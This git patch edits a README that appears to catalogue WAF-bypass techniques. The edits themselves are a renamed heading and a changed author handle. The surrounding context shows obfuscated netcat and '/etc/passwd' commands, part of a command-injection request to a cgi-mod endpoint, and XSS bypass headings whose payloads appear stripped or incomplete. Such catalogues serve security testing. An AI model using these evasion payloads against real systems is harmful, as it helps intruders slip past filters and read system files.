From f111d0479cab34ef0437c30327ea87c23f2fd0da Mon Sep 17 00:00:00 2001 From: Infected Drake Date: Mon, 3 Jun 2019 13:18:59 +0530 Subject: [PATCH] Small perky update to stuff --- README.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index f024f94..b3a924a 100644 --- a/README.md +++ b/README.md @@ -2349,7 +2349,7 @@ __Standard__: `/bin/nc 127.0.0.1 1337` __Obfuscated__: `/???/n? 2130706433 1337` Used chars: `/ ? n [0-9]` -__9. String Concatenation__ +__9. Dynamic Payload Generation__ - Different programming languages have different syntaxes and patterns for concatenation. - This allows us to effectively generate payloads that can bypass many filters and rules. @@ -2363,7 +2363,7 @@ __Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa''ss'wd` __Standard__: `` __Obfuscated__: ``` - + ``` __13. Obfuscation in Other Formats__ @@ -2694,7 +2694,7 @@ GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&co Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT) ``` -- XSS Bypass by [0xInfection](https://twitter.com/0xInfection) +- XSS Bypass by [@0xInfection](https://twitter.com/0xInfection) ``` clickhere ```